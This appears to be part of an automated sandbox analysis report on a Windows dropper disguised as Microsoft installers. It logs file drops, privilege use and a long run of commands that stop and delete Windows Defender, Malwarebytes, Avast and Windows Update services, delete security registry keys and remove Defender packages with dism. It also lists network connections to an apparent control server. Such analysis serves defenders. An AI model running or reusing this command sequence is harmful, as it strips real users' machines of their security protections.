| File opened for modification | C:\Program Files\Windows Defender\it-IT\shellext.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\InstallerX64.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Program Files\InstallerX64.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\shellext.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Program Files\Microsoft.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Program Files\__tmp_rar_sfx_access_check_240548093 | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files\installerX32.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Builded.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Security\BrowserCore\manifest.json | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Program Files\installerX32.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File created | C:\Program Files\Microsoft office.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft office.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Program Files\Builded.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\40C316FB-2070-4D39-B3FB-19D0B49130AC\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\6C5E4D15-DBE6-4E55-A993-7D93B8CCBA15\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\DE5D499E-F7B0-4291-8C13-E04A8F350107\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\937B2A0B-291B-4F71-8243-9C9820669BC2\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\88A2D0B7-7C24-4495-8D9E-1F1CEC1C422F\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\EDE7CFFD-5509-49E7-9932-F9337B53F2BC\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\B51B9057-C91E-401A-BB67-42F504BD0D10\dismhost.exe | N/A |
Launches sc.exe
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\System32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Microsoft office.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\installerX32.exe | N/A |
| N/A | N/A | C:\Program Files\InstallerX64.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe
"C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe"
C:\Program Files\Microsoft.exe
"C:\Program Files\Microsoft.exe"
C:\Program Files\Builded.exe
"C:\Program Files\Builded.exe"
C:\Program Files\installerX32.exe
"C:\Program Files\installerX32.exe"
C:\Program Files\InstallerX64.exe
"C:\Program Files\InstallerX64.exe"
C:\Program Files\Microsoft office.exe
"C:\Program Files\Microsoft office.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7DF0.tmp\7DF0.tmp\7DF1.bat "C:\Program Files\InstallerX64.exe""
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7DEF.tmp\7DF0.tmp\7DF1.bat "C:\Program Files\installerX32.exe""
C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKEY_CLASSES_ROOT\CLSID\{5FDD51E2-A9D0-44CE-8C8D-162BA0C591A0}" /v "Version"
C:\Windows\system32\sc.exe
sc stop windefend
C:\Windows\system32\reg.exe
reg query "HKEY_CLASSES_ROOT\CLSID\{5FDD51E2-A9D0-44CE-8C8D-162BA0C591A0}" /v "Version"
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\InboxApplications\Microsoft.Windows.SecHealthUI_10.0.19041.1165_neutral_neutral_cw5n1h2txyewy" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\sc.exe
sc delete windefend
C:\Windows\system32\reg.exe
reg delete "HKEY_CLASSES_ROOT\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\sc.exe
sc config windefend start= disabled
C:\Windows\system32\sc.exe
sc stop WdNisSvc
C:\Windows\system32\reg.exe
reg delete "HKEY_CLASSES_ROOT\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\sc.exe
sc config WdNisSvc start= disabled
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AM-Default-Definitions-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc delete WdNisSvc
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc stop Sense
C:\Windows\system32\sc.exe
sc config Sense start= disabled
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc delete Sense
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-ApplicationGuard-Inbox-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Client-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc stop wuauserv
C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-CloudClean-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc stop usosvc
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc config usosvc start= disabled
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc stop WaasMedicSvc
C:\Windows\system32\sc.exe
sc config WaasMedicSvc start= disabled
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Group-Policy-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc stop SecurityHealthService
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc config SecurityHealthService start= disabled
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc delete SecurityHealthService
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc stop SDRSVC
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-MDM-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc config SDRSVC start= disabled
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc stop wscsvc
C:\Windows\system32\sc.exe
sc config wscsvc start= disabled
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Nis-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Shield-Provider-Core-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc stop WdiServiceHost
C:\Windows\system32\sc.exe
sc config WdiServiceHost start= disabled
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-AM-Default-Definitions-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
C:\Windows\system32\sc.exe
sc stop WdiSystemHost
C:\Windows\system32\sc.exe
sc config WdiSystemHost start= disabled
C:\Windows\system32\sc.exe
sc stop InstallService
C:\Windows\system32\sc.exe
sc config InstallService Start= disabled
C:\Windows\system32\sc.exe
sc stop VaultSvc
C:\Windows\system32\sc.exe
sc config VaultSvc start= disabled
C:\Windows\system32\sc.exe
sc stop Spooler
C:\Windows\system32\sc.exe
sc config Spooler start= disabled
C:\Windows\system32\sc.exe
sc stop LicenseManager
C:\Windows\system32\sc.exe
sc config LicenseManager start= disabled
C:\Windows\system32\sc.exe
sc stop DiagTrack
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\system32\sc.exe
sc config DiagTrack start= disabled
C:\Windows\system32\taskkill.exe
taskkill /f /im smartscreen.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im SecurityHealthService.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im MpCopyAccelerator.exe
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\dismhost.exe {3F00BE13-26AE-4701-A6EC-CED460AC4440}
C:\Windows\system32\taskkill.exe
taskkill /f /im MpCopyAccelerator.exe
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdBoot" /f
C:\Windows\system32\sc.exe
sc delete sense
C:\Windows\system32\taskkill.exe
taskkill /f /im MBAMWsc.exe
C:\Windows\system32\sc.exe
sc stop MBAMService
C:\Windows\system32\taskkill.exe
taskkill /f /im MBAM.exe
C:\Windows\system32\sc.exe
sc config Bytefenceservice start= disabled
C:\Windows\system32\taskkill.exe
taskkill /f /im Bytefence.exe
C:\Windows\system32\sc.exe
sc stop "avast! Tools"
C:\Windows\system32\sc.exe
sc stop "avast! Antivirus"
C:\Windows\system32\sc.exe
sc config "avast! Antivirus" start= disabled
C:\Windows\system32\sc.exe
sc delete "avast! Tools"
C:\Windows\system32\sc.exe
sc config "avast! Tools" start= disabled
C:\Windows\system32\sc.exe
sc delete Bytefenceservice
C:\Windows\system32\sc.exe
sc stop Bytefenceservice
C:\Windows\system32\sc.exe
sc delete MBAMService
C:\Windows\system32\sc.exe
sc config MBAMService start= disabled
C:\Windows\system32\sc.exe
sc stop nsWscSvc
C:\Windows\system32\sc.exe
sc delete windefend
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v SecurityHealth /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisSvc" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisDrv" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdFilter" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Security Health" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f
C:\Windows\system32\taskkill.exe
taskkill /f /im SystemSettings.exe
C:\Windows\System32\taskkill.exe
taskkill /f /im SecurityHealthService.exe
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
C:\Users\Admin\AppData\Local\Temp\937B2A0B-291B-4F71-8243-9C9820669BC2\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\937B2A0B-291B-4F71-8243-9C9820669BC2\dismhost.exe {418040CE-5D0F-4A87-AFFE-3CB37680E851}
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
C:\Users\Admin\AppData\Local\Temp\6C5E4D15-DBE6-4E55-A993-7D93B8CCBA15\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\6C5E4D15-DBE6-4E55-A993-7D93B8CCBA15\dismhost.exe {880B7798-5C9C-475D-92AA-2DE845763EF5}
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
C:\Users\Admin\AppData\Local\Temp\88A2D0B7-7C24-4495-8D9E-1F1CEC1C422F\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\88A2D0B7-7C24-4495-8D9E-1F1CEC1C422F\dismhost.exe {F51D587E-8FF6-4937-AD32-AD752C23D0AC}
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-ApplicationGuard-Inbox-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
C:\Users\Admin\AppData\Local\Temp\EDE7CFFD-5509-49E7-9932-F9337B53F2BC\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\EDE7CFFD-5509-49E7-9932-F9337B53F2BC\dismhost.exe {31354C29-D3BB-4B19-948A-2B0DB4949433}
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-Client-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
C:\Users\Admin\AppData\Local\Temp\B51B9057-C91E-401A-BB67-42F504BD0D10\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\B51B9057-C91E-401A-BB67-42F504BD0D10\dismhost.exe {A3EE0EA6-E1F1-437A-B03A-CD69BE63D526}
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-Group-Policy-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
C:\Users\Admin\AppData\Local\Temp\40C316FB-2070-4D39-B3FB-19D0B49130AC\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\40C316FB-2070-4D39-B3FB-19D0B49130AC\dismhost.exe {48F81515-E0DB-4CED-BA8D-B978C62A199A}
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Shield-Provider-Core-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
C:\Users\Admin\AppData\Local\Temp\DE5D499E-F7B0-4291-8C13-E04A8F350107\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\DE5D499E-F7B0-4291-8C13-E04A8F350107\dismhost.exe {46F08BF2-CF4F-46D3-A95F-08B16B3C6FB6}
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MRT" /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "SettingsPageVisibility" /t REG_SZ /d "hide:windowsdefender" /f
Network
| Country | Destination | Domain | Proto |
| N/A | 45.139.105.147:5200 | tcp | |
| N/A | 45.139.105.147:1234 | tcp | |
| N/A | 93.184.220.29:80 | tcp | |
| N/A | 8.8.8.8:53 | data.topababa.com | udp |
| N/A | 45.139.105.147:1234 | tcp | |
| N/A | 20.42.65.89:443 | tcp | |
| N/A | 45.139.105.147:5200 | tcp | |
| N/A | 8.8.8.8:53 | data.topababa.com | udp |
| N/A | 104.110.191.133:80 | tcp | |
| N/A | 104.110.191.133:80 | tcp | |
| N/A | 45.139.105.147:5200 | tcp | |
| N/A | 45.139.105.147:1234 | tcp | |
| N/A | 8.8.8.8:53 | data.topababa.com | udp |
| N/A | 45.139.105.147:5200 | tcp | |
| N/A | 45.139.105.147:1234 | tcp | |
| N/A | 8.8.8.8:53 | data.topababa.com | udp |
| N/A | 45.139.105.147:5200 | tcp | |
| N/A | 45.139.105.147:5200 | tcp | |
| N/A | 8.8.8.8:53 | data.topababa.com | udp |
